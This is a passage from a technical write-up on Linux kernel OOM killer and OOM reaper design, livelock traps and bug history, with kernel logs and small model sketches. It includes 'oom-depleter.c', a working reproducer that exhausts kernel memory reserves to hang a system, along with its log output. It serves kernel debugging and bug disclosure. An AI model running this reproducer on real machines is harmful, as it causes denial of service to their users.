[  364.166737]  [<ffffffff81729877>] down_write+0x47/0x60
[  364.168258]  [<ffffffff811c3284>] ? vma_link+0x44/0xc0
[  364.169773]  [<ffffffff811c3284>] vma_link+0x44/0xc0
[  364.171255]  [<ffffffff811c5c05>] mmap_region+0x3a5/0x5b0
[  364.172822]  [<ffffffff811c6204>] do_mmap+0x3f4/0x4c0
[  364.174324]  [<ffffffff811a64dc>] vm_mmap_pgoff+0xbc/0x100
[  364.175894]  [<ffffffff811c4060>] SyS_mmap_pgoff+0x1c0/0x290
[  364.177499]  [<ffffffff81002c91>] ? do_syscall_64+0x21/0x170
[  364.179118]  [<ffffffff81022b7d>] SyS_mmap+0x1d/0x20
[  364.180592]  [<ffffffff81002ccc>] do_syscall_64+0x5c/0x170
[  364.182140]  [<ffffffff8172b9da>] entry_SYSCALL64_slow_path+0x25/0x25
[  364.183855] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  365.199023] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=28254
[  366.283955] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  368.158264] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  369.568325] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  371.416533] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  373.159185] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  374.835808] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  376.386226] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  378.223962] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  379.601584] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  381.067290] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  382.394818] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  383.918460] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  385.540088] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  386.915094] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  388.297575] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  391.598638] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  393.580423] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  395.744709] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  397.377497] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  399.614030] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  401.103803] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  402.484887] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  404.503755] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  406.433219] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  407.958772] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  410.094990] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  413.509253] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  416.820991] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  420.485121] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  422.302336] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  424.623738] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  425.204811] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064
[  425.592191] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064
[  430.507619] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  432.487807] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  436.810127] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  439.310553] oom_reaper: unable to reap pid:5652 (tgid=5398)
[  441.404857] oom_reaper: unable to reap pid:5652 (tgid=5398)
---------- Example output end ----------

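However, rewriting every operation that can be called while mmap_sem is held in exclusive mode so that it becomes killable is not realistic, because the error handling would become too complex. Therefore, in Linux 4.8, when the OOM reaper fails to take mmap_sem in shared mode twice, the mm_struct is treated as if reclaim by the OOM reaper had already completed.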
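
The "give up after two failures" rule can be pictured with a small user-space model. This is only a sketch under assumptions: struct reap_model_mm, MODEL_MAX_FAILURES and model_reap_attempt() are hypothetical names invented for illustration, the lock is reduced to a single boolean, and none of this is the kernel's actual implementation. Only the threshold of two failures and the MMF_OOM_REAPED idea come from the explanation above.

```c
#include <stdbool.h>

#define MODEL_MAX_FAILURES 2 /* "twice", as described in the text */

/* Hypothetical stand-in for mm_struct as seen by the OOM reaper. */
struct reap_model_mm {
        bool writer_holds_mmap_sem;   /* someone holds mmap_sem exclusively */
        bool oom_reaped;              /* models MMF_OOM_REAPED */
        int failed_attempts;          /* shared-mode trylock failures so far */
        unsigned long reclaimable_kb; /* memory the reaper could free */
};

/* One reap attempt. Returns the number of kB reclaimed by this attempt. */
static unsigned long model_reap_attempt(struct reap_model_mm *mm)
{
        unsigned long freed;

        if (mm->oom_reaped)
                return 0;
        if (mm->writer_holds_mmap_sem) {
                /* Shared-mode trylock failed; give up once the limit is hit. */
                if (++mm->failed_attempts >= MODEL_MAX_FAILURES)
                        mm->oom_reaped = true;
                return 0;
        }
        /* Lock taken in shared mode: reclaim and mark the mm as reaped. */
        freed = mm->reclaimable_kb;
        mm->reclaimable_kb = 0;
        mm->oom_reaped = true;
        return freed;
}
```

In this model, an mm whose lock stays held exclusively ends up marked as reaped after the second attempt even though nothing was reclaimed, which is what lets the OOM killer move on to another victim.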


5.4 The flow of OOM killer in Linux 4.8

So, here is the flow of the OOM killer as of Linux 4.8-rc1.

(kill1)

Omitted because it is the same as (kill1) in Linux 4.7.

(kill2)

If the current thread has not yet released its mm_struct, and all the thread groups using that mm_struct are exiting (the SIGNAL_GROUP_EXIT flag or the PF_EXITING flag is set), free memory may become available when that mm_struct is released. Therefore, to avoid killing more processes than necessary, the TIF_MEMDIE flag is set on the current thread and the OOM reaper is invoked.

Otherwise it is the same as (kill2) in Linux 4.7.

(kill3)

Omitted because it is the same as (kill3) in Linux 4.5.

(kill4)

Omitted because it is the same as (kill4) in Linux 4.7.

(kill5)

oom_scan_process_thread() decides whether the thread group can be a candidate to be killed by the OOM killer.

If the thread group contains a thread with the TIF_MEMDIE flag set, the MMF_OOM_REAPED flag is checked. If the MMF_OOM_REAPED flag is set, that thread group is ignored.

Otherwise it is the same as (kill5) in Linux 4.7.

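(kill6)

oom_badness() judges how much the thread contributes to the OOM situation.

In deciding whether killing is appropriate, it now checks not only the oom_score_adj value and the MMF_OOM_REAPED flag but also whether the thread was created by vfork(). This is based on the guess that, since a child process created by vfork() merely shares the mm_struct used by its parent process, killing a child process created by vfork() is almost meaningless. (Trap 9)

Otherwise it is the same as (kill6) in Linux 4.7.

(kill7)

Omitted because it is the same as (kill7) in Linux 4.5.

(kill8)

oom_kill_process() performs the processing for actually sending the SIGKILL signal and killing the victim.

If the thread has not yet released its mm_struct, and all the thread groups using that mm_struct are exiting, free memory may become available when that mm_struct is released. Therefore, to avoid killing more processes than necessary, it sets the TIF_MEMDIE flag on that thread, invokes the OOM reaper, and returns to the caller.

(kill9)

Omitted because it is the same as (kill9) in Linux 4.5.

(kill10)

The SIGKILL signal is also sent to the other thread groups using that mm_struct, provided that they are eligible to be killed by the OOM killer. Here, the oom_score_adj value is ignored. This is because, based on the guess that there is no reason to allow multiple $pid sharing the same mm_struct to have different oom_score_adj values (even though the value can be changed via /proc/$pid/oom_score_adj), the kernel was changed so that thread groups sharing the same mm_struct share the same oom_score_adj value (except in the vfork() case). (Trap 10)

Also, if the mm_struct is shared with the init process (whose termination causes a kernel panic) or with a kernel thread (which is not appropriate to kill), the OOM reaper cannot be invoked. To avoid falling into an OOM livelock situation because the OOM reaper cannot be invoked, the MMF_OOM_REAPED flag is set on that mm_struct so that the mm_struct is ignored by the check in (kill5). (Trap 11)

Otherwise it is the same as (kill10) in Linux 4.6.

(kill11)

If taking mmap_sem failed twice, a flag named MMF_OOM_REAPED is set on that mm_struct.

Otherwise it is the same as (kill11) in Linux 4.7.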

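Now that we have gone to the trouble of starting to address the "OOM livelock situation occurs even though the OOM killer could be invoked" problem, we would like to be able to prove that an OOM livelock situation cannot occur as long as the OOM killer can be invoked, rather than merely reducing its probability, wouldn't we? So, for Linux 4.8, work is in progress with the aim of making that provable.

task_will_free_mem() performed its check per thread up to Linux 4.6 and per thread group in Linux 4.7, but in Linux 4.8 it performs the check per mm_struct. However, regardless of whether the check is per thread, per thread group, or per mm_struct, as long as the same thread can use the task_will_free_mem() shortcut from out_of_memory() forever, the possibility of an OOM livelock situation remains. Therefore, Linux 4.8 changes (kill2) so that the task_will_free_mem() shortcut cannot be used when reclaim by the OOM reaper has already completed.

Now, will we be able to prove that an OOM livelock situation cannot occur in Linux 4.8? The answer is "unfortunately, no". So let me explain the remaining traps.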

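(Trap 9) stems from the assumption that most memory consumption is associated with the mm_struct. One known usage of oom_score_adj is the following: "a parent process which cannot be killed by the OOM killer (oom_score_adj is set to -1000) creates a child process with vfork(), changes the child process to a state where it can be killed by the OOM killer (oom_score_adj is set to 0), and then the child process executes a program using the execve() system call". Because this case exists, an exception is made which allows a child process created by vfork() to have an oom_score_adj value different from that of its parent process. However, as CVE-2010-4243 showed, even a child process created by vfork() can consume a considerable amount of memory that is not associated with the mm_struct, as the argv[]/envp[] arguments of the execve() system call. Therefore, the decision to exclude child processes created by vfork() from being killed is not always desirable. But since Michal Hocko takes the view that "whoever allows such stupid processing is at fault", it was adopted as is.

(Trap 10) exists to avoid falling into an OOM livelock situation when the OOM reaper cannot be started because of "super-twisted multithreading". The case where a parent process and its child process created by vfork() differ in whether they can be killed by the OOM killer can also be regarded as "super-twisted multithreading". However, a program which creates "twisted multithreading" presumably has some reason for doing so. For example, we cannot deny the possibility that there are programs which run as "super-twisted multithreading" in order to test the situation just barely before the OOM killer is invoked.

(Trap 11) is the only place where it has not been proven that an OOM livelock situation cannot occur as long as the OOM killer can be invoked.

One way to avoid an OOM livelock situation even when the OOM reaper could not be invoked is to delegate to the OOM reaper the decision of whether memory reclaim is safe, so that "the OOM killer always invokes the OOM reaper together with setting the TIF_MEMDIE flag". However, Michal Hocko takes the view that "when it is obvious that memory reclaim cannot be done, I want to handle it inside the OOM killer without handing it over to the OOM reaper", and keeps rejecting this approach.

One way to "handle it inside the OOM killer without handing it over to the OOM reaper" is to clear the TIF_MEMDIE flag that was set in (kill9) together with setting the MMF_OOM_REAPED flag in (kill10). When the OOM reaper started clearing the TIF_MEMDIE flag in Linux 4.6, a change which makes the OOM reaper kernel thread freezable was also adopted in order to avoid a race with the suspend functionality. However, later investigation revealed that making the kernel thread freezable did not actually avoid the race with the suspend functionality. And since the view then became "we want to do without a patch for avoiding the race with the suspend functionality, so we want to avoid having the OOM reaper or the OOM killer clear the TIF_MEMDIE flag", the approach of clearing the TIF_MEMDIE flag in (kill10) also keeps being rejected.

As a result, what is going to be adopted in Linux 4.8 is the behavior that, at the check in (kill5), the mm_struct is ignored if the MMF_OOM_REAPED flag is also set even though the TIF_MEMDIE flag is set. However, the find_lock_task_mm() function, which is called at the check in (kill5) to obtain the mm_struct used by the thread group containing the thread with the TIF_MEMDIE flag, has the problem that it can no longer obtain the mm_struct after all threads of that thread group have released it. One way to deal with this problem is to return OOM_SCAN_CONTINUE rather than OOM_SCAN_ABORT when find_lock_task_mm() could not obtain the mm_struct used by the thread group containing the thread with the TIF_MEMDIE flag. However, this approach was also rejected, with the view that "this is not something that needs to be addressed in a hurry for Linux 4.8". As a result, OOM_SCAN_ABORT is returned when find_lock_task_mm() could not obtain the mm_struct used by the thread group containing the thread with the TIF_MEMDIE flag, so a slight possibility of falling into an OOM livelock situation remains. (Too bad!)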
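
The decision described for the (kill5) check, including the remaining gap, can be summarized as a small user-space model. This is only a sketch under assumptions: the enum, both structs and model_scan_group() are hypothetical names invented for illustration (the MODEL_SCAN_* values merely mirror the OOM_SCAN_ABORT / OOM_SCAN_CONTINUE results named above), and the continue_when_mm_gone parameter models the rejected proposal rather than any real kernel option.

```c
#include <stdbool.h>
#include <stddef.h>

enum model_scan {
        MODEL_SCAN_OK,       /* evaluate this group as a normal candidate */
        MODEL_SCAN_CONTINUE, /* skip this group and keep scanning */
        MODEL_SCAN_ABORT     /* stop scanning and wait for the existing victim */
};

struct scan_mm {
        bool oom_reaped; /* models MMF_OOM_REAPED */
};

struct scan_group {
        bool has_memdie_thread; /* some thread in the group has TIF_MEMDIE */
        struct scan_mm *mm;     /* NULL once every thread has released it */
};

static enum model_scan model_scan_group(const struct scan_group *g,
                                        bool continue_when_mm_gone)
{
        if (!g->has_memdie_thread)
                return MODEL_SCAN_OK;
        if (g->mm == NULL) /* the mm_struct lookup failed */
                return continue_when_mm_gone ? MODEL_SCAN_CONTINUE
                                             : MODEL_SCAN_ABORT;
        if (g->mm->oom_reaped)
                return MODEL_SCAN_CONTINUE;
        return MODEL_SCAN_ABORT;
}
```

Calling model_scan_group() with continue_when_mm_gone set to false reproduces the behavior described for Linux 4.8: a group that still has a TIF_MEMDIE thread but whose mm_struct can no longer be looked up makes the scan abort, which is where the slight possibility of livelock comes from.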

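Currently, toward Linux 4.9, we are looking for a way to prove that an OOM livelock situation cannot occur as long as the OOM killer can be invoked, in a form that does not depend on the OOM killer or the OOM reaper clearing the TIF_MEMDIE flag, by making it possible to obtain the mm_struct used by the thread group containing the thread with the TIF_MEMDIE flag without using the find_lock_task_mm() function.

Incidentally, the OOM reaper is available only on MMU kernels (kernels compiled with the CONFIG_MMU=y kernel config). On no-MMU kernels (kernels compiled without CONFIG_MMU=y), the OOM reaper is unavailable. Therefore, for no-MMU kernels, far from proving that the "OOM livelock situation occurs even though the OOM killer could be invoked" problem does not happen, nothing has been improved at all. Since nobody tests no-MMU kernels, it is even possible that the fixes made for MMU kernels have made OOM livelock situations more likely on no-MMU kernels. A timeout-based approach would also work on no-MMU kernels, but Michal Hocko takes the view that "I have never heard of a case where OOM livelock occurred in a no-MMU environment in the first place (no-MMU environments surely do not allow the kind of reckless memory usage that causes OOM livelock)", so there is no prospect of this being addressed.

It is about time to finish with the "OOM livelock situation occurs even though the OOM killer could be invoked" problem, and to focus on the far nastier "OOM livelock situation occurs without the OOM killer being able to be invoked" problem.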


Chapter 6   Troubles regarding kernel's memory management


6.1 Kernel Memory Allocation Watchdog (kmallocwd)

As I explained at timeout-based workarounds, we would be able to avoid OOM livelock situations if we were allowed to invoke the OOM killer based on some timeout. But so far there is no prospect of timeout-based judgement being accepted. And due to the existence of the "too small to fail" memory-allocation rule, we cannot do anything once an OOM livelock situation occurs.

Then, at the very least, we want to be notified of stalling memory allocation requests when an OOM livelock situation might be occurring. Otherwise, when a system hangs, we cannot tell whether the cause is related to memory allocation requests.

Therefore, I have been proposing the Kernel Memory Allocation Watchdog (kmallocwd) functionality, which monitors memory allocation requests in kernel space. (The lines starting with MemAlloc: in this page are output from this functionality.)

Addressing bugs caused by software resembles identifying the culprit and turning them in by yourself. Since the Linux kernel's memory management subsystem does not print any message when something unexpected is occurring, the skill of identifying the culprit by yourself is especially strongly required. But not all Linux users have that skill.

This functionality is an important first-step aid for isolating the problem, but there is no prospect of it being accepted, because the justification for and necessity of adding such a large amount of processing is considered questionable. Unless more and more people report problems as "this may be a bug related to the memory management subsystem", enough to bother the memory management people, they will keep asserting innocence without knowing what problems are occurring.


6.2 Various ambushes, in chronological order?

In this section, I enumerate various memory management bugs under OOM situations which are not yet explained in the sections above. For each bug, I attach a reproducer program as needed.


November 2014  SysRq-f cannot invoke the OOM killer due to dependency on workqueue

Since a SysRq-f request from the keyboard is processed in interrupt context, it cannot synchronously wait for completion of the OOM killer. Therefore, SysRq-f enqueues a request to invoke the OOM killer on system_wq, which is shared across the whole system, and the OOM killer is triggered asynchronously by a workqueue kernel thread. But while the workqueue is processing other requests, it cannot process the request to invoke the OOM killer.

Therefore, when the workqueue gets stuck due to an OOM livelock situation, it can never invoke the OOM killer, and the system cannot recover from the OOM livelock situation using a SysRq-f request.

Since the OOM reaper was introduced, the TIF_MEMDIE flag is automatically cleared by the OOM reaper, and the OOM killer can continue selecting the next OOM victim. Therefore, in many cases, occurrence of an OOM livelock situation is avoided.

November 2014  The OOM killer invoked by SysRq-f keeps selecting the same TIF_MEMDIE thread

Like I demonstrated at memset+write case, the OOM killer invoked by SysRq-f request selects next OOM victim even if there is a thread with TIF_MEMDIE flag set. But the logic of select_bad_process() simply selects a thread group with largest oom_badness() value (without taking into account whether that thread group has a thread with TIF_MEMDIE flag already set). As a result, when OOM livelock situation occurred, SysRq-f forever selects a thread with TIF_MEMDIE flag already set, and the system cannot recover from OOM livelock situation using SysRq-f request.

Since the OOM reaper was introduced, thread groups with a TIF_MEMDIE thread are automatically ignored, and the OOM killer can go on to select the next OOM victim. Therefore, in many cases, the OOM livelock situation is avoided.
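
The difference between the two selection rules can be sketched as below. This is a toy model under my own assumptions, not the code of select_bad_process(): struct toy_task and toy_select_victim() are hypothetical names, and the badness field merely stands in for the oom_badness() value.

```c
#include <assert.h>
#include <stddef.h>

struct toy_task {
        int pid;
        unsigned long badness; /* Stand-in for the oom_badness() value. */
        int memdie;            /* Nonzero if already chosen as an OOM victim. */
};

/*
 * Return the index of the task with the largest badness value.
 * If skip_memdie is nonzero, tasks already chosen as a victim are ignored.
 * Returns -1 if no task is eligible.
 */
static int toy_select_victim(const struct toy_task *tasks, size_t n,
                             int skip_memdie)
{
        int chosen = -1;
        size_t i;

        assert(tasks != NULL || n == 0);
        for (i = 0; i < n; i++) {
                if (skip_memdie && tasks[i].memdie)
                        continue;
                if (chosen < 0 || tasks[i].badness > tasks[chosen].badness)
                        chosen = (int) i;
        }
        return chosen;
}
```

With skip_memdie set to 0, the task with the largest value is returned again and again even though it is already marked. With skip_memdie set to 1, the next largest unmarked task is returned instead.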

December 2014  The OOM killer sets TIF_MEMDIE on an already terminating thread

As I explained in the OOM killer's behavior, a terminating thread releases its mm_struct at exit_mm() called from do_exit() and clears the TIF_MEMDIE flag. Therefore, setting the TIF_MEMDIE flag via task_will_free_mem(current) in out_of_memory() needs to be permitted only when the current thread has not yet released its mm_struct.

But since no such check was performed, a child process which had been killed by the OOM killer got the TIF_MEMDIE flag again. The parent process could not reap the child process because its own memory allocation request was in progress, and the TIF_MEMDIE flag set on the child process blocked that memory allocation request. The result was an OOM livelock situation.

This bug was fixed by commit d7a94e7e11badf84 ("oom: don't count on mm-less current process") and commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock").

February 2015  An incident which broke the reliability of file I/O

Between Linux 3.19-rc6 and Linux 3.19-rc7, commit 9879de7373fc ("mm: page_alloc: embed OOM killing naturally into allocation slowpath") was merged. The patch was originally meant to be a mere cleanup, but it had a side effect: GFP_NOFS / GFP_NOIO allocation requests were no longer retried (in other words, the "too small to fail" memory-allocation rule no longer applied to them). This led to a completely unusable situation where an ext4 filesystem got errors simply because the OOM killer was invoked.

Of course, it would be best if we could get rid of the "too small to fail" memory-allocation rule. But suddenly removing it without any preparation, like a sucker punch, is not acceptable. Therefore, the original behavior was restored by commit cc87317726f85153 ("mm: page_alloc: revert inadvertent !__GFP_FS retry behavior change").

Then, an attempt was made to limit the number of retries in a memory allocation request using a /proc/sys/vm/nr_alloc_retry interface. But since nobody actively tests the behavior under out of memory situations, there was no chance to gradually decrease the number of retries, and the attempt went up in smoke. Therefore, the "too small to fail" memory-allocation rule still exists.
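
The idea of the rule, and of a retry limit on top of it, can be sketched as a small decision function. This is a toy model and not the code of the page allocator or of the proposed patch: toy_should_retry() and its retry_limit parameter are hypothetical, and treating every request above the costly order as "allowed to fail" is a simplification. Only the value 3 is taken from the kernel's PAGE_ALLOC_COSTLY_ORDER.

```c
#define TOY_COSTLY_ORDER 3 /* Same value as PAGE_ALLOC_COSTLY_ORDER. */

/*
 * Returns nonzero if the allocator should loop again.
 * order:       size of the request as a power of two in pages.
 * attempts:    how many times this request was already tried.
 * retry_limit: 0 means "no limit", which models the "too small to fail"
 *              rule. Other values model a hypothetical retry limit.
 */
static int toy_should_retry(unsigned int order, unsigned int attempts,
                            unsigned int retry_limit)
{
        if (order > TOY_COSTLY_ORDER)
                return 0; /* Simplification: large requests may fail. */
        if (retry_limit == 0)
                return 1; /* Small request, no limit: retry forever. */
        return attempts < retry_limit;
}
```

With retry_limit set to 0, an order 0 request is retried no matter how many attempts were already made, which is exactly why such a request can loop forever when no memory comes back.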

June 2015  Timeout-based workaround for OOM livelock situation after the OOM killer is invoked

As an alternative to the /proc/sys/vm/panic_on_oom interface, which triggers a kernel panic as soon as the OOM killer is invoked, an attempt was made to trigger a kernel panic only when the OOM livelock situation is not resolved within a threshold period (controlled by a /proc/sys/vm/panic_on_oom_timeout interface) after the OOM killer is invoked. But since we did not come to an agreement on when to trigger the kernel panic, this attempt also went up in smoke.

In the background, there was a conflict between two opinions: "the system should be rebooted via a kernel panic rather than selecting the next OOM victim if the OOM livelock situation is not resolved within a predetermined period" and "rebooting the system via a kernel panic is too much, because selecting the next OOM victim several times might resolve the OOM livelock situation".

August 2015  Memory depletion due to ordering of setting TIF_MEMDIE flag and sending SIGKILL signal

This topic is about pointing out a flaw in the abovementioned commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock"). When the patch was proposed, I commented that "We should set TIF_MEMDIE flag after sending SIGKILL signal". But at that time, my comment was rejected with the response "It makes no difference because the process will be terminated anyway". Therefore, I demonstrated how large the time window between setting the TIF_MEMDIE flag and sending the SIGKILL signal can become, using the fact that printing kernel messages with printk() is a rather slow operation.

---------- oom-depleter.c start ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>

static int null_fd = EOF;
static char *buf = NULL;
static unsigned long size = 0;

static int dummy(void *unused)
{
        pause();
        return 0;
}

static int trigger(void *unused)
{
        read(null_fd, buf, size); /* Will cause OOM due to overcommit */
        return 0;
}

int main(int argc, char *argv[])
{
        int pipe_fd[2] = { EOF, EOF };
        unsigned long i;
        null_fd = open("/dev/zero", O_RDONLY);
        pipe(pipe_fd);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        /*
         * Create many child threads in order to enlarge time lag between
         * the OOM killer sets TIF_MEMDIE to thread group leader and
         * the OOM killer sends SIGKILL to that thread.
         */
        for (i = 0; i < 1000; i++) {
                clone(dummy, malloc(1024) + 1024, CLONE_SIGHAND | CLONE_VM,
                      NULL);
                if (!i)
                        close(pipe_fd[1]);
        }
        /* Let a child thread trigger the OOM killer. */
        clone(trigger, malloc(4096)+ 4096, CLONE_SIGHAND | CLONE_VM, NULL);
        /* Wait until the first child thread is killed by the OOM killer. */
        read(pipe_fd[0], &i, 1);
        /* Deplete all memory reserve using the time lag. */
        for (i = size; i; i -= 4096)
                buf[i - 1] = 1;
        return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter.c end ----------
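
The reproducer above notices the death of its first child thread through the pipe: only that child still holds the write end, so read() on the read end returns as soon as the child is gone. A minimal sketch of the same trick in isolation is shown below. It is an illustration under my own assumptions: it uses fork() instead of clone(), kill() plays the role of the OOM killer, and toy_detect_child_death() is a hypothetical name.

```c
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Returns the value of read() on the pipe after the child was killed.
 * 0 means EOF: the last write end was closed by the death of the child.
 * Returns -1 if the pipe or the child could not be created.
 */
static ssize_t toy_detect_child_death(void)
{
        int pipe_fd[2];
        char c;
        ssize_t ret;
        pid_t pid;

        if (pipe(pipe_fd) < 0)
                return -1;
        pid = fork();
        if (pid < 0) {
                close(pipe_fd[0]);
                close(pipe_fd[1]);
                return -1;
        }
        if (pid == 0) {
                /* Child: keep the write end open and sleep until killed. */
                close(pipe_fd[0]);
                for (;;)
                        pause();
        }
        /* Parent: drop our write end, so that only the child holds one. */
        close(pipe_fd[1]);
        /* Stand-in for the OOM killer. */
        kill(pid, SIGKILL);
        /* Blocks until every write end is closed, then returns 0 (EOF). */
        ret = read(pipe_fd[0], &c, 1);
        close(pipe_fd[0]);
        waitpid(pid, NULL, 0);
        return ret;
}
```

Nothing is ever written to the pipe, so the only way for read() to return is the EOF caused by the child's exit. The call therefore returns 0 once the child has been killed.
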
---------- Example output start ----------
[   38.613801] sysrq: SysRq : Show Memory
[   38.616506] Mem-Info:
[   38.618106] active_anon:18185 inactive_anon:2085 isolated_anon:0
[   38.618106]  active_file:10615 inactive_file:18972 isolated_file:0
[   38.618106]  unevictable:0 dirty:7 writeback:0 unstable:0
[   38.618106]  slab_reclaimable:3015 slab_unreclaimable:4217
[   38.618106]  mapped:9940 shmem:2146 pagetables:1319 bounce:0
[   38.618106]  free:378300 free_pcp:486 free_cma:0
[   38.640475] Node 0 DMA free:9980kB min:400kB low:500kB high:600kB active_anon:2924kB inactive_anon:80kB active_file:816kB inactive_file:896kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:596kB shmem:80kB slab_reclaimable:240kB slab_unreclaimable:308kB kernel_stack:80kB pagetables:64kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   38.655621] lowmem_reserve[]: 0 1731 1731 1731
[   38.657497] Node 0 DMA32 free:1503220kB min:44652kB low:55812kB high:66976kB active_anon:69816kB inactive_anon:8260kB active_file:41644kB inactive_file:74992kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:28kB writeback:0kB mapped:39164kB shmem:8504kB slab_reclaimable:11820kB slab_unreclaimable:16560kB kernel_stack:3472kB pagetables:5212kB unstable:0kB bounce:0kB free_pcp:1944kB local_pcp:668kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   38.672950] lowmem_reserve[]: 0 0 0 0
[   38.673726] Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB
[   38.676854] Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB
[   38.680159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   38.681517] 31733 total pagecache pages
[   38.682162] 0 pages in swap cache
[   38.682711] Swap cache stats: add 0, delete 0, find 0/0
[   38.683554] Free swap  = 0kB
[   38.684053] Total swap = 0kB
[   38.684528] 524157 pages RAM
[   38.685022] 0 pages HighMem/MovableOnly
[   38.685645] 76583 pages reserved
[   38.686173] 0 pages hwpoisoned
[   48.046321] oom-depleter invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   48.047754] oom-depleter cpuset=/ mems_allowed=0
[   48.048779] CPU: 1 PID: 4797 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   48.050612] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   48.052434]  0000000000000000 000000004ecba3fc ffff88006c4938d0 ffffffff81614c2f
[   48.053816]  ffff88006c482580 ffff88006c493970 ffffffff81611671 0000000000001000
[   48.055218]  ffff88006c493918 ffffffff8109463c ffff8800784b2b40 ffff88007fc556f8
[   48.057428] Call Trace:
[   48.058775]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   48.060647]  [<ffffffff81611671>] dump_header+0x84/0x21c
[   48.062591]  [<ffffffff8109463c>] ? update_curr+0x9c/0xe0
[   48.064393]  [<ffffffff810917f7>] ? __enqueue_entity+0x67/0x70
[   48.066506]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[   48.068633]  [<ffffffff81091ee0>] ? pick_next_entity+0xa0/0x150
[   48.070768]  [<ffffffff8110fad4>] oom_kill_process+0x364/0x3d0
[   48.072874]  [<ffffffff81281550>] ? security_capable_noaudit+0x40/0x60
[   48.074948]  [<ffffffff8110fd83>] out_of_memory+0x1f3/0x490
[   48.076820]  [<ffffffff81115214>] __alloc_pages_nodemask+0x904/0x930
[   48.078885]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   48.080781]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   48.082936]  [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[   48.084981]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   48.086791]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   48.088636]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[   48.090630]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   48.092359]  [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[   48.094065]  [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[   48.095939]  [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[   48.097690]  [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[   48.099545]  [<ffffffff8117b489>] vfs_read+0x79/0x120
[   48.101129]  [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[   48.102648]  [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[   48.104388] Mem-Info:
[   48.105396] active_anon:410470 inactive_anon:2085 isolated_anon:0
[   48.105396]  active_file:0 inactive_file:31 isolated_file:0
[   48.105396]  unevictable:0 dirty:0 writeback:0 unstable:0
[   48.105396]  slab_reclaimable:1689 slab_unreclaimable:5719
[   48.105396]  mapped:390 shmem:2146 pagetables:2097 bounce:0
